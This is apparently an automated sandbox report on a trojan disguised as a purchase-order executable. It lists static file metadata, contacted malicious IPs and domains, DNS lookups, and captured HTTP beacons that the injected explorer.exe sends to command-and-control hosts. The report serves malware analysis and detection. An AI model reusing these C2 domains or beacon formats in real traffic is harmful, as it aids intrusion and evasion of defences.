                                                                    http://www.typography.netDPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.fontbureau.com/designers/cabarga.htmlNPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                      high
                                                                      http://www.founder.com.cn/cn/cThePO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.galapagosdesign.com/staff/dennis.htmPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://fontfabrik.comPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.founder.com.cn/cnPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.fontbureau.com/designers/frere-jones.htmlPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                        high
                                                                        http://www.jiyu-kobo.co.jp/PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://www.galapagosdesign.com/DPleasePO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://www.gnu.orgPO-RFQ # 097663899.exefalse
                                                                          high
                                                                          http://www.fontbureau.com/designers8PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                            high
                                                                            http://www.fonts.comPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                              high
                                                                              http://www.sandoll.co.krPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.urwpp.deDPleasePO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.zhongyicts.com.cnPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePO-RFQ # 097663899.exe, 00000000.00000002.251630889.000000000307C000.00000004.00000001.sdmp, PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                http://www.sakkal.comPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown

                                                                                Contacted IPs


                                                                                Public

IP | Domain | Country | ASN | ASN Name | Malicious
198.54.117.218 | parkingpage.namecheap.com | United States | 22612 | NAMECHEAP-NETUS | false
209.99.40.222 | www.agarkovsport.online | United States | 40034 | CONFLUENCE-NETWORK-INCVG | true
185.107.56.197 | www.aquaroyaume.com | Netherlands | 43350 | NFORCENL | true
212.237.249.116 | www.farmacyfastfood.com | Denmark | 48854 | ZITCOMDK | true
160.153.136.3 | bigbuddyco.com | United States | 21501 | GODADDY-AMSDE | true
34.102.136.180 | salesenablementlaunch.com | United States | 15169 | GOOGLEUS | false
103.253.212.249 | kopebitest.com | Indonesia | 58487 | RUMAHWEB-AS-IDRumahwebIndonesiaCVID | true
94.136.40.51 | www.globalperfumery.com | United Kingdom | 20738 | GD-EMEA-DC-LD5GB | true

                                                                                General Information

                                                                                Joe Sandbox Version:31.0.0 Emerald
                                                                                Analysis ID:383978
                                                                                Start date:08.04.2021
                                                                                Start time:13:31:42
                                                                                Joe Sandbox Product:CloudBasic
                                                                                Overall analysis duration:0h 10m 55s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Sample file name:PO-RFQ # 097663899.exe
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                Number of analysed new started processes analysed:29
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:1
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • HDC enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Detection:MAL
                                                                                Classification:mal100.troj.evad.winEXE@7/1@14/8
                                                                                EGA Information:Failed
                                                                                HDC Information:
                                                                                • Successful, ratio: 9.9% (good quality ratio 8.9%)
                                                                                • Quality average: 71.9%
                                                                                • Quality standard deviation: 31.4%
                                                                                HCA Information:
                                                                                • Successful, ratio: 100%
                                                                                • Number of executed functions: 86
                                                                                • Number of non-executed functions: 145
                                                                                Cookbook Comments:
                                                                                • Adjust boot time
                                                                                • Enable AMSI
                                                                                • Found application associated with file extension: .exe
                                                                                Warnings:
                                                                                • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 20.82.209.183, 40.88.32.150, 52.147.198.201, 168.61.161.212, 23.54.113.53, 13.64.90.137, 52.255.188.83, 95.100.54.203, 20.82.210.154, 23.10.249.26, 23.10.249.43, 23.0.174.200, 23.0.174.185, 20.54.26.129
                                                                                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net
                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                                                Simulations

                                                                                Behavior and APIs

Time | Type | Description
13:32:39 | API Interceptor | 1x Sleep call for process: PO-RFQ # 097663899.exe modified

                                                                                Joe Sandbox View / Context

                                                                                IPs

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                                                                                Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                                                                                ASN


                                                                                JA3 Fingerprints

                                                                                No context

                                                                                Dropped Files

                                                                                No context

                                                                                Created / dropped Files

                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO-RFQ # 097663899.exe.log
Process: C:\Users\user\Desktop\PO-RFQ # 097663899.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1314
Entropy (8bit): 5.350128552078965
Encrypted: false
SSDEEP: 24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
MD5: 1DC1A2DCC9EFAA84EABF4F6D6066565B
SHA1: B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
SHA-256: 28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
SHA-512: 95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
Malicious: true
Reputation: high, very likely benign file
                                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                                Static File Info

                                                                                General

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.8413755633297075
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.80%
• Win32 Executable (generic) a (10002005/4) 49.75%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Windows Screen Saver (13104/52) 0.07%
• Generic Win/DOS Executable (2004/3) 0.01%
File name: PO-RFQ # 097663899.exe
File size: 532480
MD5: 3a480d8d735efe129dcccea48a054721
SHA1: 444f3d7795694fb3fd462b6cf3f5c2776e4a1196
SHA256: 006dcd5baa67723c1d34336ca9d3eb55eb53cdb58999a8c6a3a64b28c2848220
SHA512: 665f468fd10cab796c277b3d5e9344b00f443f837010deb810e9da0e1265d8d3d997d9e60ae467916a8807818ac0a8c63d9c40d7e5c86c89d43961174c3b68c4
SSDEEP: 12288:bV7SVAcc+PHH+E1JhJKozcMZi+qEFUOMXR:x7SicLeE1wW+k4
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V6n`..............P..............2... ...@....@.. ....................................@................................

                                                                                File Icon

                                                                                Icon Hash:00828e8e8686b000

                                                                                Static PE Info

                                                                                General

Entrypoint: 0x4832d2
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x606E3656 [Wed Apr 7 22:46:46 2021 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                Entrypoint Preview

                                                                                Instruction
                                                                                jmp dword ptr [00402000h]
                                                                                add byte ptr [eax], al

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x83280 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x84000 | 0x614 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x86000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x812d8 | 0x81400 | False | 0.901811079545 | data | 7.85500503575 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0x84000 | 0x614 | 0x800 | False | 0.3359375 | data | 3.43679274564 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x86000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_VERSION | 0x84090 | 0x384 | data | |
RT_MANIFEST | 0x84424 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

Imports

DLL | Import
mscoree.dll | _CorExeMain

Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright 2018
Assembly Version | 1.0.0.0
InternalName | Url.exe
FileVersion | 1.0.0.0
CompanyName | BobbleSoft
LegalTrademarks |
Comments | Converts one textual format to another.
ProductName | Format Converter
ProductVersion | 1.0.0.0
FileDescription | Format Converter
OriginalFilename | Url.exe

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
04/08/21-13:33:30.395435 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49712 | 34.102.136.180 | 192.168.2.5
04/08/21-13:33:35.569008 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49713 | 34.102.136.180 | 192.168.2.5

                                                                                Network Port Distribution

                                                                                TCP Packets


                                                                                UDP Packets


DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Apr 8, 2021 13:33:30.210724115 CEST | 192.168.2.5 | 8.8.8.8 | 0xb067 | Standard query (0) | www.mayipay9.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:33:35.405210018 CEST | 192.168.2.5 | 8.8.8.8 | 0x9fb0 | Standard query (0) | www.salesenablementlaunch.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:33:40.915441036 CEST | 192.168.2.5 | 8.8.8.8 | 0xeb20 | Standard query (0) | www.oldschoolnews.net | A (IP address) | IN (0x0001)
Apr 8, 2021 13:33:46.397650003 CEST | 192.168.2.5 | 8.8.8.8 | 0x7616 | Standard query (0) | www.aquaroyaume.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:33:51.550884008 CEST | 192.168.2.5 | 8.8.8.8 | 0xdf83 | Standard query (0) | www.globalperfumery.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:34:01.743119001 CEST | 192.168.2.5 | 8.8.8.8 | 0x3ff5 | Standard query (0) | www.kopebitest.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:34:07.454755068 CEST | 192.168.2.5 | 8.8.8.8 | 0x3d43 | Standard query (0) | www.qingniang.club | A (IP address) | IN (0x0001)
Apr 8, 2021 13:34:12.860888958 CEST | 192.168.2.5 | 8.8.8.8 | 0x187d | Standard query (0) | www.lattakia-imbiss.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:34:17.937128067 CEST | 192.168.2.5 | 8.8.8.8 | 0x17d2 | Standard query (0) | www.ahaal20.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:34:23.019419909 CEST | 192.168.2.5 | 8.8.8.8 | 0xf3bc | Standard query (0) | www.farmacyfastfood.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:34:28.178893089 CEST | 192.168.2.5 | 8.8.8.8 | 0xe300 | Standard query (0) | www.bigbuddyco.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:34:33.301706076 CEST | 192.168.2.5 | 8.8.8.8 | 0xa891 | Standard query (0) | www.agarkovsport.online | A (IP address) | IN (0x0001)
Apr 8, 2021 13:34:39.329008102 CEST | 192.168.2.5 | 8.8.8.8 | 0xfaac | Standard query (0) | www.xiaoqiche.net | A (IP address) | IN (0x0001)
Apr 8, 2021 13:34:44.375610113 CEST | 192.168.2.5 | 8.8.8.8 | 0xe01d | Standard query (0) | www.almosting.com | A (IP address) | IN (0x0001)

                                                                                DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Apr 8, 2021 13:33:30.246296883 CEST | 8.8.8.8 | 192.168.2.5 | 0xb067 | No error (0) | www.mayipay9.com | mayipay9.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:33:30.246296883 CEST | 8.8.8.8 | 192.168.2.5 | 0xb067 | No error (0) | mayipay9.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:33:35.440232038 CEST | 8.8.8.8 | 192.168.2.5 | 0x9fb0 | No error (0) | www.salesenablementlaunch.com | salesenablementlaunch.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:33:35.440232038 CEST | 8.8.8.8 | 192.168.2.5 | 0x9fb0 | No error (0) | salesenablementlaunch.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:33:40.935023069 CEST | 8.8.8.8 | 192.168.2.5 | 0xeb20 | No error (0) | www.oldschoolnews.net | parkingpage.namecheap.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:33:40.935023069 CEST | 8.8.8.8 | 192.168.2.5 | 0xeb20 | No error (0) | parkingpage.namecheap.com | | 198.54.117.218 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:33:40.935023069 CEST | 8.8.8.8 | 192.168.2.5 | 0xeb20 | No error (0) | parkingpage.namecheap.com | | 198.54.117.217 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:33:40.935023069 CEST | 8.8.8.8 | 192.168.2.5 | 0xeb20 | No error (0) | parkingpage.namecheap.com | | 198.54.117.211 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:33:40.935023069 CEST | 8.8.8.8 | 192.168.2.5 | 0xeb20 | No error (0) | parkingpage.namecheap.com | | 198.54.117.210 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:33:40.935023069 CEST | 8.8.8.8 | 192.168.2.5 | 0xeb20 | No error (0) | parkingpage.namecheap.com | | 198.54.117.215 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:33:40.935023069 CEST | 8.8.8.8 | 192.168.2.5 | 0xeb20 | No error (0) | parkingpage.namecheap.com | | 198.54.117.212 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:33:40.935023069 CEST | 8.8.8.8 | 192.168.2.5 | 0xeb20 | No error (0) | parkingpage.namecheap.com | | 198.54.117.216 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:33:46.444155931 CEST | 8.8.8.8 | 192.168.2.5 | 0x7616 | No error (0) | www.aquaroyaume.com | | 185.107.56.197 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:33:51.593406916 CEST | 8.8.8.8 | 192.168.2.5 | 0xdf83 | No error (0) | www.globalperfumery.com | | 94.136.40.51 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:34:01.857958078 CEST | 8.8.8.8 | 192.168.2.5 | 0x3ff5 | No error (0) | www.kopebitest.com | kopebitest.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:34:01.857958078 CEST | 8.8.8.8 | 192.168.2.5 | 0x3ff5 | No error (0) | kopebitest.com | | 103.253.212.249 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:34:07.841377020 CEST | 8.8.8.8 | 192.168.2.5 | 0x3d43 | Name error (3) | www.qingniang.club | none | none | A (IP address) | IN (0x0001)
Apr 8, 2021 13:34:12.890397072 CEST | 8.8.8.8 | 192.168.2.5 | 0x187d | Name error (3) | www.lattakia-imbiss.com | none | none | A (IP address) | IN (0x0001)
Apr 8, 2021 13:34:17.996918917 CEST | 8.8.8.8 | 192.168.2.5 | 0x17d2 | Server failure (2) | www.ahaal20.com | none | none | A (IP address) | IN (0x0001)
Apr 8, 2021 13:34:23.092856884 CEST | 8.8.8.8 | 192.168.2.5 | 0xf3bc | No error (0) | www.farmacyfastfood.com | | 212.237.249.116 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:34:28.198776007 CEST | 8.8.8.8 | 192.168.2.5 | 0xe300 | No error (0) | www.bigbuddyco.com | bigbuddyco.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:34:28.198776007 CEST | 8.8.8.8 | 192.168.2.5 | 0xe300 | No error (0) | bigbuddyco.com | | 160.153.136.3 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:34:33.949660063 CEST | 8.8.8.8 | 192.168.2.5 | 0xa891 | No error (0) | www.agarkovsport.online | | 209.99.40.222 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:34:39.365118027 CEST | 8.8.8.8 | 192.168.2.5 | 0xfaac | Name error (3) | www.xiaoqiche.net | none | none | A (IP address) | IN (0x0001)
Apr 8, 2021 13:34:44.528567076 CEST | 8.8.8.8 | 192.168.2.5 | 0xe01d | No error (0) | www.almosting.com | alrighting.xshoppy.shop | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:34:44.528567076 CEST | 8.8.8.8 | 192.168.2.5 | 0xe01d | No error (0) | alrighting.xshoppy.shop | | 75.2.113.213 | A (IP address) | IN (0x0001)

                                                                                HTTP Request Dependency Graph

                                                                                • www.mayipay9.com
                                                                                • www.salesenablementlaunch.com
                                                                                • www.oldschoolnews.net
                                                                                • www.aquaroyaume.com
                                                                                • www.globalperfumery.com
                                                                                • www.kopebitest.com
                                                                                • www.farmacyfastfood.com
                                                                                • www.bigbuddyco.com
                                                                                • www.agarkovsport.online

                                                                                HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49712 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 13:33:30.270664930 CEST | 1292 | OUT | GET /uabu/?o0D=jL0LdZHh34d0ut&_hrPK=RBOjcSI+0PCin3DYAfURe2BWN4BeTm/4XrPmNHFHgtwunN92sbbb7RERPNQIss2FkGEY HTTP/1.1
                                                                                Host: www.mayipay9.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
Apr 8, 2021 13:33:30.395435095 CEST | 1293 | IN | HTTP/1.1 403 Forbidden
                                                                                Server: openresty
                                                                                Date: Thu, 08 Apr 2021 11:33:30 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 275
                                                                                ETag: "606abe1d-113"
                                                                                Via: 1.1 google
                                                                                Connection: close
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49713 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 13:33:35.454659939 CEST | 1294 | OUT | GET /uabu/?_hrPK=bFc1eA65WhbOipBbmVMfd20rI4CLIGZenFDlnHAQDQVOe5/sLng8MX+h5fYtrCFe3/9q&o0D=jL0LdZHh34d0ut HTTP/1.1
                                                                                Host: www.salesenablementlaunch.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
Apr 8, 2021 13:33:35.569008112 CEST | 1294 | IN | HTTP/1.1 403 Forbidden
                                                                                Server: openresty
                                                                                Date: Thu, 08 Apr 2021 11:33:35 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 275
                                                                                ETag: "605e06f8-113"
                                                                                Via: 1.1 google
                                                                                Connection: close
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.5 | 49716 | 198.54.117.218 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 13:33:41.110529900 CEST | 1341 | OUT | GET /uabu/?o0D=jL0LdZHh34d0ut&_hrPK=ruxw5m/fBZTANxn0+vJzkbJheatIWyH69nVPD3/Jlr0HuUfdGUrtHvekpNeCw/DRWxiy HTTP/1.1
                                                                                Host: www.oldschoolnews.net
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.5 | 49722 | 185.107.56.197 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 13:33:46.475327969 CEST | 2984 | OUT | GET /uabu/?_hrPK=6Zl6RiEYODzPbdy+2wZTGBaD4iiheZyVMMytIIVZHQDK7z0ruM0YoJ4KglarveH57crY&o0D=jL0LdZHh34d0ut HTTP/1.1
                                                                                Host: www.aquaroyaume.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
Apr 8, 2021 13:33:46.528913975 CEST | 3051 | IN | HTTP/1.1 302 Found
                                                                                cache-control: max-age=0, private, must-revalidate
                                                                                connection: close
                                                                                content-length: 11
                                                                                date: Thu, 08 Apr 2021 11:33:46 GMT
                                                                                location: http://survey-smiles.com
                                                                                server: nginx
                                                                                set-cookie: sid=47dc9904-985e-11eb-bcb9-1293ae6b7a88; path=/; domain=.aquaroyaume.com; expires=Tue, 26 Apr 2089 14:47:53 GMT; max-age=2147483647; HttpOnly
                                                                                Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                                                                Data Ascii: Redirecting


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.5 | 49723 | 94.136.40.51 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 13:33:51.645071030 CEST | 5686 | OUT | GET /uabu/?o0D=jL0LdZHh34d0ut&_hrPK=1HJ8hpHXj7k6l9UeC2bjkMh/CRdcIJGwkP5JhSUqrI08aFfpwfXceIsoU6U6XBnGkY13 HTTP/1.1
                                                                                Host: www.globalperfumery.com
                                                                                Connection: close
